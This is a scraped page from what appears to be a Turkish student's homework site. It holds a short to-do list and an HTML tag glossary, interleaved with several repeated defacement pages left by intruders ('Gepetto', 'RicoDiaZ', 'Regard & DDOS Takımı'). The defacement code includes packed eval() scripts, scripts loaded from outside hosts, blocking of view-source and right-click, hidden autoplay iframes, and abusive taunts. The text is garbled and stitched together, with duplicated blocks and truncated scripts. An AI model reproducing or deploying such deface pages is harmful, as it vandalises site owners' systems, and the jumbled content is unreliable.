DUYURULAR VE GÜNCELLEMELER

  • CSS Düzenlenecek.
  • Admin paneline kullancı girişi eklenecek.
  • Admin paneli içerisinde ödev sil-güncelle vb işlemler gerçekleştirilecek.
  • SQL injection vb. saldırılara karşı filtreleme classları yazılacak.
  • Javascript tabanlı ckeditora tema yüklenecek
  • Duyurular veritabanına bağlanacak

Owned Unborn 8.0 Black Pointer

[ Gepetto Was Here ]
Gepetto Connected.
Says : This one was easy.
[root@Gepetto]# Last login: c_time
[root@Gepetto]# Owned your system.


OWNED!

<---- Follow us

[root@Gepetto]#

[root@Gepetto]#
OWNED!
GEPETTO

Turkish Hackers.

[root@Gepetto]# Demands --->

dada

adminadmin

OWNED!

GEPETTO WAS HERE

1. Hafta 1. Ödev

<!--...--> Açıklama yazmak için kullanılır
<!DOCTYPE> Dosya tipini belirtir
<a> Link belirtir
<abbr> Yazının bir kısaltma olduğunu belirtir
<acronym> Kelimenin başharfleri olduğunu belirtir
<address> iletişim adresleri için kullanılır
<applet> Gömülü aplet eklemekte kullanılır(html 4 ile bu özellik iptal edilmiştir)
<area /> Resmin parçalarına ait link vermeyi sağlar
<b> Koyu harfli yazı
<base /> Tüm linkler için kaynak kök adresi belirtir
<basefont /> Fon tipi belirtir (html 4 ile bu özellik iptal edilmiştir)
<bdo> Yazının yönünü belirler
<big> Büyük yazı tanımlar
<blockquote> Uzun alıntı metin olduğunu gösterir
<body> Dosyanın ana kısmını gösterir
<br /> Alt satıra geçiş işaretidir
<button> Gönderme butonu üretir
<caption> Tablo başlığı yazar
<center> Elemanı sayfada ortalar (html 4 ile bu özellik iptal edilmiştir)
<cite> Alıntı belirtir
<code> Bilgisayar kodları belirtir
<col /> Tablo sütunları için özellik verir
<colgroup> TAblodaki bir grup sütuna özellik verir
<dd> Tanım Listesi
<del> Silinmiş yazı
<dir> Klasör listesi belirtir (html 4 ile bu özellik iptal edilmiştir)
<div> Dökümanda bir bölümü temsil eder
<dfn> Tanım kelimesini gösterir
<dl> Tanım listesi elemanı
<dt> Tanım listesindeki elemanlardan biridir
<em> Vurgulanmış yazı
<fieldset> Form için çerçeve üretir
<font> Yazı özellikleri belirtir (html 4 ile bu özellik iptal edilmiştir)
<form> Bilgi yayıt formu
<frame /> Sayfa içinde gömülü pencere açar
<frameset> Sayfada bölme yapar
<h1> ile <h6> arası Başlık yazısı belirler
<head> Dökümanın temel başlık elemanlarını içerir
<hr /> Yatay çizgi
<html> sayfa türünü belirtir
<i> Eğik yazı
<iframe> Başka bir sayfayı dökümanda gösterir
<img /> Resim
<input /> Form için bilgi alanı
<ins> Eklenmiş yazı
<isindex> Dökümana ait arama kelimesi (html 4 ile bu özellik iptal edilmiştir)
<kbd> Klavye yazısı
<label> Form için metin etiketleri
<legend> Form çerçevesi için açıklama
<li> Liste elemanı
<link /> Dökümana dışardan bir kaynak bağlar
<map> resim için parçaları tanımlar
<menu> Menü listesi (html 4 ile bu özellik iptal edilmiştir)
<meta /> Dökümana ait önemli tanımlamaları içerir
<noframes> Frame özelliği kapalı ise gösterilecek yazı
<noscript> Javascript kapalı isse gösterilecek yazı
<object> Gömülü uygulamalar
<ol> Düzenli Liste
<optgroup> Seçim listesindeki alkalı bileşenler
<option> Seçim listesindeki elemanlar
<p> Paragraf başı
<param /> Gömülü uygulamalar için ayar kısmı
<pre> Düz yazı biçimi
<q> Kısa alıntı
<s> Üseri çizili yazı (html 4 ile bu özellik iptal edilmiştir)
<samp> Örnek bilgisayar kodu gösterir
<script> Kullanıcı taraflı uygulama
<select> Seçim listesi
<small> Küçük yazı
<span> Dökümanda bir bölümü gösterir
<strike> Üzeri çizili ayzı (html 4 ile bu özellik iptal edilmiştir)
<strong> Kalın yazı
<style> Elemanların görünümünü belirten şekiller
<sub> Alt yazı
<sup> Üst yazı
<table> Tablo
<tbody> Tablo grubu
<td> Tablonun bir gözü
<textarea> Form için uzun yazı alanı
<tfoot> Tablonun dip kısmı
<th> Tablodaki başlık alanı
<thead> Tablo başlık grubu
<title> Dökümanın ana başlığı
<tr> Tablonun bir satırı
<tt> özel metin
<u> Altı çizili yazı (html 4 ile bu özellik iptal edilmiştir)
<ul> Düzensiz liste
<var> Yazı içinde değişken tanımı
<xmp> Ön tanımlı yazı (html 4 ile bu özellik iptal edilmiştir)

Owned Unborn 8.0 Black Pointer

[ Gepetto Was Here ]
Gepetto Connected.
Says : This one was easy.
[root@Gepetto]# Last login: c_time
[root@Gepetto]# Owned your system.


OWNED!

<---- Follow us

[root@Gepetto]#

[root@Gepetto]#
OWNED!
GEPETTO

Turkish Hackers.

[root@Gepetto]# Demands --->

HACKED!

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="-Gepetto-">
    <meta name="dcterms.created" content="Paz, 13 Kas 2016 17:16:50 GMT">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <title>Owned</title>
    <canvas id="spiders" class="hidden-xs" width="1280" height="451"></canvas>
    <iframe width="0" height="0" src="https://www.youtube-nocookie.com/embed/lnYk5YeMvss?rel=0&amp;controls=0&amp;showinfo=0&autoplay=1&autoreplay=1" frameborder="0" allowfullscreen></iframe>
    <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-5/cur425.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2010/10/09/unborn-8-0-black-pointer.html" target="_blank" title="Unborn 8.0 Black Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Unborn 8.0 Black Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
  <body bgcolor="#000" marginwidth="0" marginheight="0" style="background: black url(http://i.hizliresim.com/AnQQkr.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size:cover;" onload="type_text()" bottommargin="0"
 </head>

 <head>
<script language="JavaScript">
var brzinakucanja = 200;
var pauzapor = 2000;
var vremeid = null;
var kretanje = false;
var poruka = new Array();
var slporuka = 0;
var bezporuke = 0;
poruka[0] = " | [ Hacked By 'IRun 
function prikaz() {
var text = poruka[slporuka];
if (bezporuke < text.length) {
if (text.charAt(bezporuke) == " ")
bezporuke++
var ttporuka = text.substring(0, bezporuke + 1);
document.title = ttporuka;
bezporuke++
vremeid = setTimeout("prikaz()", brzinakucanja);
kretanje = true;
} else {
bezporuke = 0;
slporuka++
if (slporuka == poruka.length)
slporuka = 0;
vremeid = setTimeout("prikaz()", pauzapor);
kretanje = true;
}
}
function stop() {
if (kretanje)
clearTimeout(vremeid);
kretanje = false
}
function start() {
stop();
prikaz();
}
start();
</script>
</head>

<script src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>

var current_type = 1;
(function($) {
 
    function shuffle(a) {
        var i = a.length, j;
        while (i) {
            var j = Math.floor((i--) * Math.random());
            var t = a[i];
            a[i] = a[j];
            a[j] = t;
        }
    }
 
    function randomAlphaNum() {
        var rnd = Math.floor(Math.random() * 62);
        if (rnd >= 52) return String.fromCharCode(rnd - 4);
        else if (rnd >= 26) return String.fromCharCode(rnd + 71);
        else return String.fromCharCode(rnd + 65);
    }
 
    $.fn.rot13 = function() {
        this.each(function() {
            $(this).text($(this).text().replace(/[a-z0-9]/ig, function(chr) {
                var cc = chr.charCodeAt(0);
                if (cc >= 65 && cc <= 90) cc = 65 + ((cc - 52) % 26);
                else if (cc >= 97 && cc <= 122) cc = 97 + ((cc - 84) % 26);
                else if (cc >= 48 && cc <= 57) cc = 48 + ((cc - 43) % 10);
                return String.fromCharCode(cc);
            }));
        });
        return this;
    };
 
    $.fn.scrambledWriter = function() {
        this.each(function() {
            var $ele = $(this), str = $ele.text(), progress = 0, replace = /[^\s]/g,
                random = randomAlphaNum, inc = 3;
            $ele.text('');
            var timer = setInterval(function() {
                $ele.text(str.substring(0, progress) + str.substring(progress, str.length - 1).replace(replace, random));
                progress += inc
                if (progress >= str.length + inc) { var nstr = $ele.text(); $ele.text(nstr.substring(0,nstr.length - 1));  current_type += 1; clearInterval(timer);}
            }, 100);
        });
        return this;
    };
 
    $.fn.typewriter = function() {
        this.each(function() {
            var $ele = $(this), str = $ele.html(), progress = 0;
            $ele.html('');
            var timer = setInterval(function() {
                $ele.html(str.substring(0, progress++) + (progress & 1 ? '_' : ''));
                if (progress >= str.length) { current_type += 1; clearInterval(timer);}
            }, 100);
        });
     
        return this;
    };
 
    $.fn.unscramble = function() {
        this.each(function() {
            var $ele = $(this), str = $ele.text(), replace = /[^\s]/,
                state = [], choose = [], reveal = 25, random = randomAlphaNum;
         
            for (var i = 0; i < str.length; i++) {
                if (str[i].match(replace)) {
                    state.push(random());
                    choose.push(i);
                } else {
                    state.push(str[i]);
                }
            }
         
            shuffle(choose);
            $ele.text(state.join(''));
         
            var timer = setInterval(function() {
                var i, r = reveal;
                while (r-- && choose.length) {
                    i = choose.pop();
                    state[i] = str[i];
                }
                for (i = 0; i < choose.length; i++) state[choose[i]] = random();
                $ele.text(state.join(''));
                if (choose.length == 0) { current_type += 1; clearInterval(timer);}
            }, 200);
        });
        return this;
    };
 
})(jQuery);

function replaceAll(txt, replace, with_this) {
  return txt.replace(new RegExp(replace, 'g'),with_this);
}

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(k).1L(b(){a U=1K 1J();a n=$("#T").S();n=1I(n,\'1H\',k.1G.1F);n=n.1E(/1D/,U);$("#T").S(n);b t(){a u=k.v+"     ";a r=0;k.v=\'\';a R=g(b(){k.v=u.1C(0,r++)+(r&1?\'1B\':\'\');c(r>=u.1A){e(R);t()}},1z)}t();s("p");$("#1y").j();a Q=g(b(){c(h==2){$("#1x").f();$("#1w").j();e(Q)}},i);a P=g(b(){c(h==3){$("#1v").f();$("#1u").N();e(P)}},i);a O=g(b(){c(h==4){$("#1t").f();$("#1s").j();e(O)}},i);a M=g(b(){c(h==5){$("#1r").f();$("#1q").N();e(M)}},i);a L=g(b(){c(h==6){$("#1p").f();$("#1o").j();e(L)}},i);a K=g(b(){c(h==7){$("#1n").q();$("#1m").f(H);$("#1l").j();e(K)}},1k);a J=g(b(){c(h==8){$("#1j").f();$("#1i").j();e(J)}},i);a F=g(b(){c(h==9){I.1h(0,1g);I.1f();$("#1e").f();$("#1d").j();$(\'#p\').1c({1b:"1a%",19:"H%"},b(){$("#p").m("x","5");$("#p").m("w","5");$("#p").m("d",$(k).d()-G);$("#18").m("d",$(k).d()-G);$("#17").f()});e(F)}},i);a E=g(b(){c(h==10){$("#16").q();$("#15").f();$("#14").j();e(E)}},i);a D=g(b(){c(h==11){$("#13").q();$("#Z").f();$("#Y").j();e(D)}},i);a C=g(b(){c(h==12){$("#X").q();$("#W").f();$("#V").j();e(C)}},i)});s();b s(o){a d=$(k).d();a l=$(k).l();a B=$("#"+o).d();a y=$("#"+o).l();d=A.z((d-B)/2);l=A.z((l-y)/2);c(d<0){d=2}c(l<0){l=2}$("#"+o).m("x",d);$("#"+o).m("w",l)}',62,110,'||||||||||var|function|if|height|clearInterval|show|setInterval|current_type|500|typewriter|document|width|css|mhost|lol|xBody|hide|progress|fixPosition|title_magic|str|title|left|top|mwidth|round|Math|mheight|timer12|timer11|timer10|timer9|100|50|ytplayer|timer8|timer7|timer6|timer5|scrambledWriter|timer4|timer3|timer2|title_timer|html|ssh|today|mytext12|ssh12|4ssh|mytext11|ssh11||||3ssh|mytext10|ssh10|2ssh|picz|sshBox|right|20|bottom|animate|mytext9|ssh9|unMute|false|seekTo|mytext8|ssh8|3000|mytext7|ssh7|1ssh|mytext6|ssh6|mytext5|ssh5|mytext4|ssh4|mytext3|ssh3|mytext2|ssh2|mytext1|200|length|_|substring|c_time|replace|hostname|location|localhost|replaceAll|Date|new|ready'.split('|')))

</script>

<head>
<style>
body{
font-family: "courier new";
font-size:80%;
color: #28FE14;
}

.xBody{
width:660px;
height:450px;
position:absolute;
z-index: 9;
}
.ssh{
display:none;
z-index: 9;
}
.sshBox{
height:300px;
border: 4px solid white;
    -moz-border-radius: 4px;
    -webkit-border-radius: 4px;
    -o-border-radius: 4x;
    -khtml-border-radius: 4px;
    border-radius: 4px;
    z-index: 9;
}
.sshHead{
margin-bottom: 5px;
color:black;
font-weight: bold;
background-color: white;
height:20px;
z-index: 9;

}

.greenBox{
padding-left: 3px;
position: absolute;
height:22px;
border: 1px solid #28FE14;
z-index: 9;
}
.picz{
position: absolute;
width:500px;
height:80%;
display:none;
right:2px;
top:2px;
}
</style>
</head>
<body onselectstart="return false" ondragstart="return false" oncontextmenu="return false" onLoad="writetext()">
<div class="xBody" id="xBody">
<div id="ssh">
<div class="sshBox" id="sshBox">
<div class="sshHead">[ Gepetto Was Here ]</div>
<div id="1ssh">
<span id="mytext1"> Gepetto Connected. </span><br>
<div id="ssh2" class="ssh">Says : <span id="mytext2"> This one was easy. </span></div>
<div id="ssh3" class="ssh">[root@Gepetto]# <span id="mytext3">Last login: c_time </span></div>
<div id="ssh4" class="ssh">[root@Gepetto]# <span id="mytext4" style="color:#ffffff;">Owned your system.  </span></div>
</br> </br>
<div id="ssh5" class="ssh" " align="center"><span id="mytext5"> OWNED! </span></div>
<br>
<div id="ssh5" class="ssh" style="font-size:280%;" align="center"><span id="mytext5"><---- Follow us</span></div>
<br>
<div id="ssh6" class="ssh">[root@Gepetto]# <span id="mytext6">  </span></div>
</div>
<br>
<div id="2ssh">
<div id="ssh7" class="ssh">[root@Gepetto]# <span id="mytext7"><center>OWNED!<br>GEPETTO

<br> <br></span></div><div id="ssh5" class="ssh" style="font-size:280%;" align="center"><span id="mytext5">Turkish Hackers.</span></div>
<center><br><p> </div></center><div id="ssh10" class="ssh" style="padding-left:5px;">[root@Gepetto]# <span id="mytext10">Demands ---> <br>
</span></div>

</div>
</div>
</div>
</div>
<div class="picz" id="picz">
</div>
<div id="ytapiplayer" >
  </div>
  
 <script type="text/javascript" src="http://tsg-wall.pe.hu/js/bootstrap.min.js"></script>
 <script type="text/javascript" src="http://tsg-wall.pe.hu/js/jquery.cycle.min.js"></script>
 <script type="text/javascript" src="http://tsg-wall.pe.hu/js/jquery.parallax.min.js"></script>
  <script type="text/javascript" src="http://tsg-wall.pe.hu/js/jquery.backstretch.min.js"></script>
  <script type="text/javascript" src="http://tsg-wall.pe.hu/js/scripts.js"></script>    
 
      <script type='text/javascript'>
    //<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://www.youtube.com/watch?v=7QBLhIpJYLo"});
//]]>
  </script>
<script>
eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('w u(t){0=s.r("6");0.q();0.p();0.o(n)}7 4={m:"l"};7 2={k:"6"};j.i("h://g.f.e/v/d?c=1&b=0&a=3","9","1","1","8",5,5,4,2);',33,33,'ytplayer||atts||params|null|myytplayer|var||ytapiplayer|version|playerapiid|enablejsapi|1mlbypRQ878|com|youtube|www|http|embedSWF|swfobject|id|always|allowScriptAccess|true|setLoop|playVideo|mute|getElementById|document|playerId|onYouTubePlayerReady||function'.split('|')))
</script>


</html>

 

 

asdasdasdasd

0wn3d ULAN

Hacked By TechLord


0wn3d ULAN
CheatsLord.com Was Here !
TechLord Says: Neyse BB
Slowycan Says: Bilir misin ?#Titancore - ByDesign - HollyRooseL and All CheatsLord.com member

HACKED BY RicoDiaZ

HACKED By RicoDiaZ

Hacked by RicoDiaZ

eski bir efsaneninYarım kalmış hikayesi

J0K3R ~ Leoner ~ Milw0rm ~ Zaphkiel ~ Turkishspyhacker ~ Hoffman

RicoDiaZ Corporation Since 2010 ;)

Brothers

HACKED BY BROTHERS !


## eXeCutioneR & ImRyMaTem ##Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>

Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>

Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>

Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
We came to fucking you <s>Lamer</s><br><br><font size="4"><strong> Biri bizi sustursunnn @tabi yersee :] - Su capulcu sitene basmak istemezdim fakat bastirtmak icin can atiyorsun kalitesini siktigim putperest abaza leymir seni<br><br> Icraat Sanati Vol ??<br><br>Operative System: Linux<br>Linux srv38.main-hosting.eu 3.2.55-grsec #2 SMP Fri Mar 28 18:25:48 EDT 2014 x86_64</strong></font></font></font></font></p><br>
</br></center>
<center><font face="Courier New" color="black" face="Courier New" size="4"><font face="Courier New" color="red">[</font><strong> > CondoR ~ SiNeKBeY ~ W3R4S3L ~ PoYrAz7221 ~ Slowycan ~ Regard And Moree...  < </strong><font color="red">]</font></font></font></p></center>
<hr align="center" color="black" size="3" width="20%"><font face="Courier New" style="color: rgb(0, 0, 0); text-shadow: rgb(0, 0, 0) 0px 1px 7px;" color="black" face="Courier New" size="4"><font color="black" face="Share Tech Mono" size="4"><br>

<span style="padding:5px;border: 1px solid black;background: #f12;color: white;font-family: courier new;text-shadow: rgb(255, 255, 255) 1px 0px 8px;"><a href="http://twitter.com/WMCondoR" target="_blank" style="color: #fff;text-decoration: none;cursor: auto;"> Twitter.Com / CondoR </a></span><br><br>
<br>

Sancak.team //DDOS Takımı//Uyarıldiniz !

 
<html>
<head>
<meta charset="utf-8">
<title>Defaced by RegarD & DDOS Takımı</title>
</head>
<body bgcolor="white">
<style>a:link,a:visited{text-decoration:none;cursor:url(http://condorizmw.esy.es/lnk.cur),default;}a:hover,a:active{cursor:url(http://condorizmw.esy.es/lnk.cur),default;}body{cursor:url(http://condorizmw.esy.es/normal.cur),default;}</style>
<script language="javascript" data-rocketsrc="http://condorizmw.esy.es/engel.js" type="text/rocketscript"></script>
<script language="javascript" data-rocketsrc="http://is.sitekodlari.com/sagtusengelleme1.js" type="text/rocketscript"></script>
<img src="" align="right">
<img src="http://www.kralalemi.com/images/sol_bayrak.gif" align="left">
<iframe width="0" height="0" src="https://www.youtube.com/embed/IGlBN9p9dYw?autoplay=1" frameborder="0" allowfullscreen></iframe>
<center><img src="https://media.giphy.com/media/MfIGtdhq6Q9aM/giphy.gif" style="margin-top: -120px;"></center>
<center><h1><center><font color="black" face="Courier New">0wn3d by Regard & DDOS TAKIMI FORCE ~ Sancaktim.com</font></center></h1>
<center><font color="black" face="Courier New" size="7"><font face="Courier New" color="black">[</font><font color="red" face="Courier New" size="7">Devirdik</font><font color="black" face="Courier New" size="7"> Gidiyoruz</font><font color="black">]<br><br>
